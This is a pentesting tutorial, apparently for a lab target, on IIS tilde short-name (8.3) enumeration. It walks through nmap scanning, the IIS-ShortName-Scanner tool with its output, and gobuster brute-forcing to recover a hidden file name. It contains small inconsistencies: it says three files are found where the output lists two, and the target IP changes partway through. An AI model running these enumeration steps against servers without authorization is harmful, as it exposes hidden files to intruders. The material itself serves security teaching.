Skip to content

Pentesting Microsoft Internet Information Services (IIS)

IIS tilde directory enumeration

IIS tilde directory enumeration is a technique utilised to uncover hidden files, directories, and short file names (aka the 8.3 format) on some versions of Microsoft Internet Information Services (IIS) web servers. This method takes advantage of a specific vulnerability in IIS, resulting from how it manages short file names within its directories.

When a file or folder is created on an IIS server, Windows generates a short file name in the 8.3 format, consisting of eight characters for the file name, a period, and three characters for the extension. Intriguingly, these short file names can grant access to their corresponding files and folders, even if they were meant to be hidden or inaccessible.

The tilde (~) character, followed by a sequence number, signifies a short file name in a URL. Hence, if someone determines a file or folder's short file name, they can exploit the tilde character and the short file name in the URL to access sensitive data or hidden resources.

The attack

Assume the server contains a hidden directory named SecretDocuments. When a request is sent to http://example.com/~s, the server replies with a 200 OK status code, revealing a directory with a short name beginning with "s". Otherwise, it will return another status. The cool part is that you can guess one letter by one. The server delivers a 200 OK status code for the request http://example.com/~sec, further narrowing the short name to "sec".

Once the short name secret~1 is identified, enumeration of specific file names within that path can be performed, potentially exposing sensitive documents.

Enumeration

The initial phase involves mapping the target and determining which services are operating on their respective ports.

1
nmap -p- -sV -sC --open 10.129.73.154

IIS 7.5 is running on port 80. Executing a tilde enumeration attack on this version could be a viable option.

Tilde Enumeration using IIS ShortName Scanner

Manually sending HTTP requests for each letter of the alphabet can be a tedious process. Fortunately, there is a tool called IIS-ShortName-Scanner that can automate this task.

Download it from: https://github.com/irsdl/IIS-ShortName-Scanner

Requirements:

install Oracle Java and now you can run:

1
2
3
4
5
git clone https://github.com/irsdl/IIS-ShortName-Scanner.git

cd IIS-ShortName-Scanner/release

java -jar iis_shortname_scanner.jar 0 5 http://10.129.73.154/

Expected output:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
Do you want to use proxy [Y=Yes, Anything Else=No]? 
Early result: the target is probably vulnerable.
Early result: identified letters in names > A,C,D,E,F,L,N,O,P,R,S,T,U,X
Early result: identified letters in extensions > A,C,P,S
# IIS Short Name (8.3) Scanner version 2023.4 - scan initiated 2025/05/18 20:03:06
Target: http://10.129.73.154/
|_ Result: Vulnerable!
|_ Used HTTP method: OPTIONS
|_ Suffix (magic part): /~1/.rem
|_ Extra information:
  |_ Number of sent requests: 571
  |_ Identified directories: 2
    |_ ASPNET~1
    |_ UPLOAD~1
  |_ Identified files: 2
    |_ CSASPX~1.CS
      |_ Actual extension = .CS
    |_ TRANSF~1.ASP

Upon executing the tool, it discovers 2 directories and 3 files. However, the target does not permit GET access to http://10.129.204.231/TRANSF~1.ASP, necessitating the brute-forcing of the remaining filename.

1
2
3
4
5
egrep -r ^transf /usr/share/wordlists/* | sed 's/^[^:]*://' > /tmp/list.txt


```shell-session
gobuster dir -u http://10.129.73.154/ -w /tmp/list.txt -x .aspx,.asp

Output:

1
transfer.aspx
Last update: 2025-06-01
Created: June 1, 2025 11:12:15